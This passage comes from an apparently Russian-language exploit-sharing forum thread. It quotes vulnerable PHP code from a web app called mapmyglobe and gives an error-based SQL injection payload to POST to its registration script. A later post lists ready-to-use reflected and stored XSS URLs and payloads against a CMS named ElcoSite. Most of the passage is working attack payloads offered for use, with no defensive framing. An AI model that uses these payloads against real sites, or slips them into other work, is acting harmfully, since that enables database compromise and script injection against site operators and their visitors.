[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'select * from user where name="'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'"'[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"])){
echo[/COLOR][COLOR="#DD0000"]"Username already exists. Please try again."[/COLOR][COLOR="#007700"];
exit;
}
[/COLOR][/COLOR]
/lib/dbconfig.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#007700"]) {
global[/COLOR][COLOR="#0000BB"]$conn[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$conf[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$conn[/COLOR][COLOR="#007700"]);
if (![/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]) {
if ([/COLOR][COLOR="#0000BB"]$conf[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'prod'[/COLOR][COLOR="#007700"]]){
die([/COLOR][COLOR="#DD0000"]"Invalid query"[/COLOR][COLOR="#007700"]);
}
else{
die([/COLOR][COLOR="#DD0000"]"Invalid query --[/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#DD0000"]-- "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
}
}
return[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
$conf['prod'] по умолчанию не установлен, поэтому имеем вывод в ошибке.
Эксплуатация:
Код:
Code:
http://localhost/mapmyglobe-0.1/user/caccnt.php
POST:
username="and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and"
|
|
|
|
31.03.2011, 21:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
30555
Репутация:
85
|
|
CMS ElcoSite
Активная XSS вида ">[XSS] в форме для комментариев по адресу
Сообщение от None
/publication.mhtml
Сообщение от None
/search.mhtml?Search=">alert(%2Fxss%2F)
/publication.mhtml?Part=38&PubID=1%22%3E%3Cscript%3 Ealert%28%2Fxss%2F%29%3C%2Fscript%3E
/publication.mhtml?Part=3">
------------------------------------------> UPD UPD
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
